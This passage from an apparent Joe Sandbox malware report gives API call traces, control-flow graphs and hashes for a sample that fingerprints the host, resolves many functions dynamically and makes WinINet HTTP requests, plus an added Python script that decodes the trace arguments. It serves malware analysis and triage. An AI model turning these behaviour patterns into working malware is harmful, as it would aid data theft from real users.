                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 2c431fc47d1f9f143c6809085817432ea509640ed74c995adc947b5bb4bd2712
                                      • Instruction ID: 957461aa91c37f7d901a39d4f773a1a4353301619d76ac742e9e84b3c2585765
                                      • Opcode Fuzzy Hash: 2c431fc47d1f9f143c6809085817432ea509640ed74c995adc947b5bb4bd2712
                                      • Instruction Fuzzy Hash: F5715E71A40218ABEF24DFA4CC59FEE7775EB44700F1081A9F50A6B1C4DBB5AA84CF61
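The sandbox prints the WinINet sequence above (InternetOpenA through InternetReadFile) and the VirtualProtect call in the earlier entry with raw hexadecimal arguments. The following is an added example, not part of the Joe Sandbox report: it parses those trace lines and decodes the argument values against the documented Win32 constants, so a triager can read "00400100" as INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION and "00000100" as PAGE_GUARD without opening a header file. The trace lines are copied from the entries above (sandbox output, not a live capture); "?" is an argument the analyser could not resolve, and the sanity notes only restate what the displayed arguments imply, since the sandbox reconstructs some of them statically.

```python
"""Decode the raw hexadecimal arguments of a Joe Sandbox API trace (added example)."""
import re

# Trace lines copied from the report entries above; "?" = unresolved by the sandbox.
TRACE = """
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D347EC
InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D3644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D364BD
"""

# One call per line: Api.MODULE(arg,arg,...), ref: ADDRESS. Lines of another shape
# ("Part of subcall function ...", "wsprintfA.USER32 ref: ...") are skipped.
LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")

# Documented Win32 constants (public SDK header values, nothing sample-derived).
PAGE_PROTECT = {
    0x1: "PAGE_NOACCESS", 0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE",
    0x8: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
INTERNET_FLAGS = {
    0x100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x200: "INTERNET_FLAG_NO_UI",
    0x1000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID", 0x2000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x80000: "INTERNET_FLAG_NO_COOKIES", 0x200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x800000: "INTERNET_FLAG_SECURE",
    0x4000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD",
}
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY = {19: "HTTP_QUERY_STATUS_CODE"}


def flags(table):
    """Decoder for a bitmask: known bits by name (ascending), leftover bits as hex."""
    def decode(value):
        names = [name for bit, name in sorted(table.items()) if value & bit]
        rest = value & ~sum(table)
        if rest:
            names.append(f"0x{rest:X}")
        return "|".join(names) if names else "0"
    return decode


def enum(table):
    """Decoder for a single enumerated value; unknown values stay hex."""
    return lambda value: table.get(value, f"0x{value:X}")


# Zero-based argument index -> (SDK parameter name, decoder), per API.
DECODERS = {
    "VirtualProtect":     {1: ("dwSize", lambda v: f"{v} bytes"), 2: ("flNewProtect", flags(PAGE_PROTECT))},
    "InternetOpenA":      {1: ("dwAccessType", enum(OPEN_TYPE))},
    "InternetConnectA":   {5: ("dwService", enum(SERVICE))},
    "HttpOpenRequestA":   {1: ("lpszVerb", enum({})), 6: ("dwFlags", flags(INTERNET_FLAGS))},
    "InternetSetOptionA": {1: ("dwOption", enum(OPTION))},
    "HttpQueryInfoA":     {1: ("dwInfoLevel", enum(QUERY))},
    "InternetReadFile":   {2: ("dwNumberOfBytesToRead", lambda v: f"{v} bytes")},
}


def parse_trace(text):
    """Split trace text into call records: api, module, ref and raw argument strings."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip().lstrip("•").strip())
        if m:
            calls.append({"api": m["api"], "module": m["mod"], "ref": m["ref"],
                          "args": m["args"].split(",") if m["args"] else []})
    return calls


def annotate(call):
    """Return the decodable arguments of one call as {parameter: meaning}."""
    out = {}
    for idx, (name, decoder) in DECODERS.get(call["api"], {}).items():
        if idx >= len(call["args"]):
            continue
        raw = call["args"][idx]
        if raw == "?":
            out[name] = "?"                      # unresolved by the sandbox: do not guess
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
            out[name] = decoder(int(raw, 16))
        else:
            out[name] = raw                      # symbolic argument, e.g. the verb GET
    return out


def findings(calls):
    """Observations that follow directly from the arguments as displayed."""
    notes = []
    for call in calls:
        args, decoded = call["args"], annotate(call)
        if call["api"] == "VirtualProtect" and args[2] != "?":
            prot = int(args[2], 16)
            if prot & 0x100 and not prot & 0xFF:   # PAGE_GUARD is a modifier, normally OR'ed with a base protection
                notes.append("VirtualProtect: PAGE_GUARD with no base protection combined")
            if args[3] == "00000000":              # documented to fail with a NULL lpflOldProtect
                notes.append("VirtualProtect: NULL lpflOldProtect, the call fails as written")
        if call["api"] == "HttpOpenRequestA" and decoded.get("dwFlags", "?") != "?" \
                and "INTERNET_FLAG_SECURE" not in decoded["dwFlags"]:
            notes.append("HttpOpenRequestA: no INTERNET_FLAG_SECURE, request goes over plaintext HTTP")
    return notes


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for call in calls:
        print(f"{call['ref']} {call['api']:20s} {annotate(call)}")
    for note in findings(calls):
        print("note:", note)
```

Run the file as-is to print one decoded line per call followed by the notes; feed it other entries from this report by pasting their "APIs" lines into TRACE. Two caveats: the decoders only know a handful of APIs and constants, so extend DECODERS for anything else you paste in, and a pointer-looking 8-hex-digit argument (like the lpszVersion address 0167E3F8) is only decoded where an index in DECODERS names it as a constant.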

                                      Control-flow Graph (rendered as a figure in the original, with executed and not-executed blocks colour-coded; block structure recovered from the graph data:)
                                      • d47690-d476da (GetWindowsDirectoryA) -> d476e3-d47757 (GetVolumeInformationA, call d48e90 x3), directly or via d476dc
                                      • d476e3-d47757 -> d47768-d4776f, which loops through d47771-d4778a (call d48e90) until it falls through to d4778c-d477a7 (GetProcessHeap, RtlAllocateHeap)
                                      • d4778c-d477a7 -> d477b8-d477e8 (wsprintfA, call d4aa50) or -> d477a9-d477b6 (call d4aa50); both -> d4780e-d4781e
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D476D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D4779A
                                      • wsprintfA.USER32 ref: 00D477D0
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 4af01b8410f2b3fc3d279a9e27ca4f7223c075fdb138ffdebbacd37c0ddf65bf
                                      • Instruction ID: b995857fc0d9f75ddc8610eddde3026feca79035bbf57461e2616b10292e70e3
                                      • Opcode Fuzzy Hash: 4af01b8410f2b3fc3d279a9e27ca4f7223c075fdb138ffdebbacd37c0ddf65bf
                                      • Instruction Fuzzy Hash: 7E41A3B1D04248DBDB21DF94CC45BDEBBB8EF08704F104199F649AB280D779AA44CBB5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 348eee8ddc1f49017261222905659e8f84a68593cb53ff0083e0c8a8d4bb3b00
                                      • Instruction ID: d4cf2c64736e2c1cd71ec9c59c7e1b279e322fd7c4342f1fc373fb607127b045
                                      • Opcode Fuzzy Hash: 348eee8ddc1f49017261222905659e8f84a68593cb53ff0083e0c8a8d4bb3b00
                                      • Instruction Fuzzy Hash: CCF04FB1944209EFC710DF98DD46BAEBBB8EB05711F10021AFA55A2680C77965048BA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 78844f05a45b58cc9e5af80ca2b1a1033421c495cbed5412d915197b8fbc96d5
                                      • Instruction ID: 8fb2d9cb055ce65631211e665c4dc150957d67e3631bf936ab5218417864b265
                                      • Opcode Fuzzy Hash: 78844f05a45b58cc9e5af80ca2b1a1033421c495cbed5412d915197b8fbc96d5
                                      • Instruction Fuzzy Hash: 7BD05E7490030C9BCB10DFE498496DDBB79BB0C215F000554D94562280EA356445CB65
                                      Control-flow Graph
                                      control_flow_graph 633 d49f20-d49f2a 634 d4a346-d4a3da LoadLibraryA * 8 633->634 635 d49f30-d4a341 GetProcAddress * 43 633->635 636 d4a456-d4a45d 634->636 637 d4a3dc-d4a451 GetProcAddress * 5 634->637 635->634 638 d4a526-d4a52d 636->638 639 d4a463-d4a521 GetProcAddress * 8 636->639 637->636 640 d4a52f-d4a5a3 GetProcAddress * 5 638->640 641 d4a5a8-d4a5af 638->641 639->638 640->641 642 d4a5b5-d4a642 GetProcAddress * 6 641->642 643 d4a647-d4a64e 641->643 642->643 644 d4a654-d4a72a GetProcAddress * 9 643->644 645 d4a72f-d4a736 643->645 644->645 646 d4a7b2-d4a7b9 645->646 647 d4a738-d4a7ad GetProcAddress * 5 645->647 648 d4a7ec-d4a7f3 646->648 649 d4a7bb-d4a7e7 GetProcAddress * 2 646->649 647->646 650 d4a825-d4a82c 648->650 651 d4a7f5-d4a820 GetProcAddress * 2 648->651 649->648 652 d4a922-d4a929 650->652 653 d4a832-d4a91d GetProcAddress * 10 650->653 651->650 654 d4a98d-d4a994 652->654 655 d4a92b-d4a988 GetProcAddress * 4 652->655 653->652 656 d4a996-d4a9a9 GetProcAddress 654->656 657 d4a9ae-d4a9b5 654->657 655->654 656->657 658 d4a9b7-d4aa13 GetProcAddress * 4 657->658 659 d4aa18-d4aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01665850), ref: 00D49F3D
                                      • GetProcAddress.KERNEL32(74DD0000,01665990), ref: 00D49F55
                                      • GetProcAddress.KERNEL32(74DD0000,01679670), ref: 00D49F6E
                                      • GetProcAddress.KERNEL32(74DD0000,016796A0), ref: 00D49F86
                                      • GetProcAddress.KERNEL32(74DD0000,016796B8), ref: 00D49F9E
                                      • GetProcAddress.KERNEL32(74DD0000,016796D0), ref: 00D49FB7
                                      • GetProcAddress.KERNEL32(74DD0000,0166B810), ref: 00D49FCF
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2F0), ref: 00D49FE7
                                      • GetProcAddress.KERNEL32(74DD0000,0167D170), ref: 00D4A000
                                      • GetProcAddress.KERNEL32(74DD0000,0167D218), ref: 00D4A018
                                      • GetProcAddress.KERNEL32(74DD0000,0167D338), ref: 00D4A030
                                      • GetProcAddress.KERNEL32(74DD0000,016659B0), ref: 00D4A049
                                      • GetProcAddress.KERNEL32(74DD0000,016659D0), ref: 00D4A061
                                      • GetProcAddress.KERNEL32(74DD0000,016659F0), ref: 00D4A079
                                      • GetProcAddress.KERNEL32(74DD0000,01665710), ref: 00D4A092
                                      • GetProcAddress.KERNEL32(74DD0000,0167D368), ref: 00D4A0AA
                                      • GetProcAddress.KERNEL32(74DD0000,0167D230), ref: 00D4A0C2
                                      • GetProcAddress.KERNEL32(74DD0000,0166B9C8), ref: 00D4A0DB
                                      • GetProcAddress.KERNEL32(74DD0000,016656D0), ref: 00D4A0F3
                                      • GetProcAddress.KERNEL32(74DD0000,0167D260), ref: 00D4A10B
                                      • GetProcAddress.KERNEL32(74DD0000,0167D398), ref: 00D4A124
                                      • GetProcAddress.KERNEL32(74DD0000,0167D1D0), ref: 00D4A13C
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2C0), ref: 00D4A154
                                      • GetProcAddress.KERNEL32(74DD0000,01665A10), ref: 00D4A16D
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2A8), ref: 00D4A185
                                      • GetProcAddress.KERNEL32(74DD0000,0167D248), ref: 00D4A19D
                                      • GetProcAddress.KERNEL32(74DD0000,0167D320), ref: 00D4A1B6
                                      • GetProcAddress.KERNEL32(74DD0000,0167D308), ref: 00D4A1CE
                                      • GetProcAddress.KERNEL32(74DD0000,0167D278), ref: 00D4A1E6
                                      • GetProcAddress.KERNEL32(74DD0000,0167D158), ref: 00D4A1FF
                                      • GetProcAddress.KERNEL32(74DD0000,0167D380), ref: 00D4A217
                                      • GetProcAddress.KERNEL32(74DD0000,0167D290), ref: 00D4A22F
                                      • GetProcAddress.KERNEL32(74DD0000,0167D3B0), ref: 00D4A248
                                      • GetProcAddress.KERNEL32(74DD0000,0167A480), ref: 00D4A260
                                      • GetProcAddress.KERNEL32(74DD0000,0167D110), ref: 00D4A278
                                      • GetProcAddress.KERNEL32(74DD0000,0167D2D8), ref: 00D4A291
                                      • GetProcAddress.KERNEL32(74DD0000,01665A30), ref: 00D4A2A9
                                      • GetProcAddress.KERNEL32(74DD0000,0167D350), ref: 00D4A2C1
                                      • GetProcAddress.KERNEL32(74DD0000,01665A70), ref: 00D4A2DA
                                      • GetProcAddress.KERNEL32(74DD0000,0167D188), ref: 00D4A2F2
                                      • GetProcAddress.KERNEL32(74DD0000,0167D1A0), ref: 00D4A30A
                                      • GetProcAddress.KERNEL32(74DD0000,01665730), ref: 00D4A323
                                      • GetProcAddress.KERNEL32(74DD0000,01665D10), ref: 00D4A33B
                                      • LoadLibraryA.KERNEL32(0167D1B8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A34D
                                      • LoadLibraryA.KERNEL32(0167D0F8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A35E
                                      • LoadLibraryA.KERNEL32(0167D3C8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A370
                                      • LoadLibraryA.KERNEL32(0167D3E0,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A382
                                      • LoadLibraryA.KERNEL32(0167D128,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A393
                                      • LoadLibraryA.KERNEL32(0167D140,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3A5
                                      • LoadLibraryA.KERNEL32(0167D1E8,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3B7
                                      • LoadLibraryA.KERNEL32(0167D200,?,00D45EF3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE7), ref: 00D4A3C8
                                      • GetProcAddress.KERNEL32(75290000,01665D50), ref: 00D4A3EA
                                      • GetProcAddress.KERNEL32(75290000,0167D500), ref: 00D4A402
                                      • GetProcAddress.KERNEL32(75290000,016791F8), ref: 00D4A41A
                                      • GetProcAddress.KERNEL32(75290000,0167D410), ref: 00D4A433
                                      • GetProcAddress.KERNEL32(75290000,01665AB0), ref: 00D4A44B
                                      • GetProcAddress.KERNEL32(734C0000,0166B770), ref: 00D4A470
                                      • GetProcAddress.KERNEL32(734C0000,01665E10), ref: 00D4A489
                                      • GetProcAddress.KERNEL32(734C0000,0166B6D0), ref: 00D4A4A1
                                      • GetProcAddress.KERNEL32(734C0000,0167D488), ref: 00D4A4B9
                                      • GetProcAddress.KERNEL32(734C0000,0167D470), ref: 00D4A4D2
                                      • GetProcAddress.KERNEL32(734C0000,01665E30), ref: 00D4A4EA
                                      • GetProcAddress.KERNEL32(734C0000,01665C70), ref: 00D4A502
                                      • GetProcAddress.KERNEL32(734C0000,0167D4D0), ref: 00D4A51B
                                      • GetProcAddress.KERNEL32(752C0000,01665BD0), ref: 00D4A53C
                                      • GetProcAddress.KERNEL32(752C0000,01665E50), ref: 00D4A554
                                      • GetProcAddress.KERNEL32(752C0000,0167D530), ref: 00D4A56D
                                      • GetProcAddress.KERNEL32(752C0000,0167D4A0), ref: 00D4A585
                                      • GetProcAddress.KERNEL32(752C0000,01665D90), ref: 00D4A59D
                                      • GetProcAddress.KERNEL32(74EC0000,0166B720), ref: 00D4A5C3
                                      • GetProcAddress.KERNEL32(74EC0000,0166B928), ref: 00D4A5DB
                                      • GetProcAddress.KERNEL32(74EC0000,0167D4E8), ref: 00D4A5F3
                                      • GetProcAddress.KERNEL32(74EC0000,01665B70), ref: 00D4A60C
                                      • GetProcAddress.KERNEL32(74EC0000,01665AF0), ref: 00D4A624
                                      • GetProcAddress.KERNEL32(74EC0000,0166B978), ref: 00D4A63C
                                      • GetProcAddress.KERNEL32(75BD0000,0167D518), ref: 00D4A662
                                      • GetProcAddress.KERNEL32(75BD0000,01665AD0), ref: 00D4A67A
                                      • GetProcAddress.KERNEL32(75BD0000,016791E8), ref: 00D4A692
                                      • GetProcAddress.KERNEL32(75BD0000,0167D4B8), ref: 00D4A6AB
                                      • GetProcAddress.KERNEL32(75BD0000,0167D548), ref: 00D4A6C3
                                      • GetProcAddress.KERNEL32(75BD0000,01665BF0), ref: 00D4A6DB
                                      • GetProcAddress.KERNEL32(75BD0000,01665B10), ref: 00D4A6F4
                                      • GetProcAddress.KERNEL32(75BD0000,0167D590), ref: 00D4A70C
                                      • GetProcAddress.KERNEL32(75BD0000,0167D560), ref: 00D4A724
                                      • GetProcAddress.KERNEL32(75A70000,01665C10), ref: 00D4A746
                                      • GetProcAddress.KERNEL32(75A70000,0167D578), ref: 00D4A75E
                                      • GetProcAddress.KERNEL32(75A70000,0167D5A8), ref: 00D4A776
                                      • GetProcAddress.KERNEL32(75A70000,0167D3F8), ref: 00D4A78F
                                      • GetProcAddress.KERNEL32(75A70000,0167D428), ref: 00D4A7A7
                                      • GetProcAddress.KERNEL32(75450000,01665D30), ref: 00D4A7C8
                                      • GetProcAddress.KERNEL32(75450000,01665B30), ref: 00D4A7E1
                                      • GetProcAddress.KERNEL32(75DA0000,01665BB0), ref: 00D4A802
                                      • GetProcAddress.KERNEL32(75DA0000,0167D440), ref: 00D4A81A
                                      • GetProcAddress.KERNEL32(6F070000,01665C30), ref: 00D4A840
                                      • GetProcAddress.KERNEL32(6F070000,01665C50), ref: 00D4A858
                                      • GetProcAddress.KERNEL32(6F070000,01665B50), ref: 00D4A870
                                      • GetProcAddress.KERNEL32(6F070000,0167D458), ref: 00D4A889
                                      • GetProcAddress.KERNEL32(6F070000,01665CF0), ref: 00D4A8A1
                                      • GetProcAddress.KERNEL32(6F070000,01665B90), ref: 00D4A8B9
                                      • GetProcAddress.KERNEL32(6F070000,01665C90), ref: 00D4A8D2
                                      • GetProcAddress.KERNEL32(6F070000,01665CB0), ref: 00D4A8EA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D4A901
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D4A917
                                      • GetProcAddress.KERNEL32(75AF0000,0167D0B0), ref: 00D4A939
                                      • GetProcAddress.KERNEL32(75AF0000,01679218), ref: 00D4A951
                                      • GetProcAddress.KERNEL32(75AF0000,0167CE88), ref: 00D4A969
                                      • GetProcAddress.KERNEL32(75AF0000,0167CEA0), ref: 00D4A982
                                      • GetProcAddress.KERNEL32(75D90000,01665CD0), ref: 00D4A9A3
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D0C8), ref: 00D4A9C4
                                      • GetProcAddress.KERNEL32(6E3C0000,01665D70), ref: 00D4A9DD
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D0E0), ref: 00D4A9F5
                                      • GetProcAddress.KERNEL32(6E3C0000,0167D008), ref: 00D4AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: c18d297694293ccf1c17a7c64fe96a8d68bc4d6b69642af39e77bb02a26dc245
                                      • Instruction ID: 0d4d8a39610d11afaeb06c12755433fdcc31995d5b0d0d878c040fa246916efe
                                      • Opcode Fuzzy Hash: c18d297694293ccf1c17a7c64fe96a8d68bc4d6b69642af39e77bb02a26dc245
                                      • Instruction Fuzzy Hash: 486221B55102409FC376DFA8E88899677BAB74D701F10851ABAC9C3298D73FB951CFA0
                                      Control-flow Graph
                                      control_flow_graph 801 d348d0-d34992 call d4aab0 call d34800 call d4aa50 * 5 InternetOpenA StrCmpCA 816 d34994 801->816 817 d3499b-d3499f 801->817 816->817 818 d349a5-d34b1d call d48cf0 call d4ac30 call d4abb0 call d4ab10 * 2 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4ac30 call d4abb0 call d4ab10 * 2 InternetConnectA 817->818 819 d34f1b-d34f43 InternetCloseHandle call d4ade0 call d3a210 817->819 818->819 905 d34b23-d34b27 818->905 829 d34f82-d34ff2 call d48b20 * 2 call d4aab0 call d4ab10 * 8 819->829 830 d34f45-d34f7d call d4ab30 call d4acc0 call d4abb0 call d4ab10 819->830 830->829 906 d34b35 905->906 907 d34b29-d34b33 905->907 908 d34b3f-d34b72 HttpOpenRequestA 906->908 907->908 909 d34b78-d34e78 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4acc0 call d4abb0 call d4ab10 call d4ac30 call d4abb0 call d4ab10 call d4aa50 call d4ac30 * 2 call d4abb0 call d4ab10 * 2 call d4ade0 lstrlen call d4ade0 * 2 lstrlen call d4ade0 HttpSendRequestA 908->909 910 d34f0e-d34f15 InternetCloseHandle 908->910 1021 d34e82-d34eac InternetReadFile 909->1021 910->819 1022 d34eb7-d34f09 InternetCloseHandle call d4ab10 1021->1022 1023 d34eae-d34eb5 1021->1023 1022->910 1023->1022 1024 d34eb9-d34ef7 call d4acc0 call d4abb0 call d4ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34965
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D3498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDE,00000000,?,?,00000000,?,",00000000,?,0167E908), ref: 00D34E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34F15
                                      • HttpOpenRequestA.WININET(00000000,0167E7A8,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D34B65
